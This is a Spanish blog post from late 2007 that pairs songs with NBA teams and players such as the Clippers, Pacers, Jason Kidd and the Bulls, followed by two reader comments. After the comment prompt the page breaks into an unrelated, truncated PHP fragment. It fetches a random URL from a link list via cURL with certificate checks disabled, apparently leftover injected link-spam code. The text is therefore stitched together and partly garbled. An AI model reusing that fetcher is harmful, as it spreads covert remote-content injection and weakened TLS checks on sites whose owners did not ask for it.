Los hits TJNBA (II)

31 de December de 2007 por MagicJohnson32

Seguimos con nuestra lista de grandes éxitos de la NBA, los mejores duetos para explicar el estado de la liga a estas alturas de la temporada 2007-2008.

“Waitin’ for a Superman” – The Flaming Lips & L.A. Clippers

No, Superman no se llama Clark Kent. Su nombre es Elton Brand, o al menos habrá que considerarlo Superman si logra, cuando se recupere de la lesión del tendón de Aquiles, meter a sus Clippers en Playoffs. El esfuerzo de Chris Kaman por sostener a los Clippers en ausencia de Brand (y de Livingston, y con Cassell más tiempo lesionado que sano) resulta encomiable aunque apenas dé para un balance de 9-19 y la duodécima plaza de la Conferencia Oeste. Habrá que ver si, como en la canción de los Flaming Lips, el peso de esta tarea no resulta excesivo, incluso para un Superman.

“A Shot In The Arm” – Wilco & Indiana Pacers

Un disparo en el brazo fue lo que se llevó Joey Qatato, uno de los técnicos de los Pacers, como resultado del tiroteo en el que derivó una salida nocturna de Jamaal Tinsley. Sin embargo, no le va del todo mal en lo deportivo a los de Indianapolis, séptimos en el Este y que esta temporada ofrecen una cara bien diferente a la del año pasado, cuando fueron todavía más aburridos y menos competitivos que de costumbre. Defienden menos que Ronaldo pero al menos compiten con los Orlando Magic por ser el mejor ataque de su conferencia. “Maybe all I need is a shot in the arm…”

“Mutiny, I Promise You” – The New Ponographers & Jason Kidd

El que avisa no es traidor. Jason Kidd sigue siendo objeto de rumores y su nombre aparece continuamente en hipotéticos traspasos. El futuro Hall Of Fame lleva tiempo dejando claro su descontento por el rumbo de la franquicia de New Jersey, pero Ratner y Thorn se resisten a dejar marchar al jugador que llevó a los Nets a sus más altas cotas, las Finales de 2002, y que mantiene al equipo entre los más competitivos del Este. Pero la marcha de Kidd parece cuestión de tiempo y los responsables de los Nets deberían plantearse si no es momento de traspasarlo y obtener por él lo que su alta consideración (y salario) en la liga todavía les reportaría. Si no, pueden encontrarse con una drástica reducción de las prestaciones deportivas del jugador, algo así como los infames 20 últimos partidos de Carter en Toronto. En ese caso, Kidd podría entonar eso de “And here’s the mutiny I promised you…” (“y aquí está el motín que te prometí…”).

“Do I Disappoint You?” – Rufus Wainwright & Chicago Bulls

Era inevitable. Un inicio de temporada tan decepcionante como el de los Bulls no dejaba alternativa: Skiles fue despedido tras acumular un balance de 9-16. Será casualidad, pero tras la lógica derrota ante los Spurs, el equipo ahora entrenado por Jim Boylan ha ganado dos partidos consecutivos y ha ofrecido ciertos síntomas que invitan al optimismo. Especialmente significativo es el buen rendimiento mostrado en estos partidos por parte de los dos teóricos líderes del equipo, Luol Deng y un Ben Gordon que parece haber aceptado de buen gran el papel de 6º hombre otorgado por el nuevo técnico. Los Bulls están aún a tiempo de responder a las expectativas generadas alrededor de su plantilla y olvidar definitivamente los rumores que desestabilizaron a los jugadores en un arranque de temporada para olvidar.

Comenta

2 comentarios a esta entrada

  1. Jabho dice:
    #1

    Jejeje, es que si los Nets traspasan a Kidd en breve se encuentran perdiendo y con Carter en la actitud Toronto

      Citar

  2. MagicJohnson32 dice:
    #2

    La cuestión es conseguir algo bueno por Kidd. Porque, además, con este equipo actual no van a ningún lado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>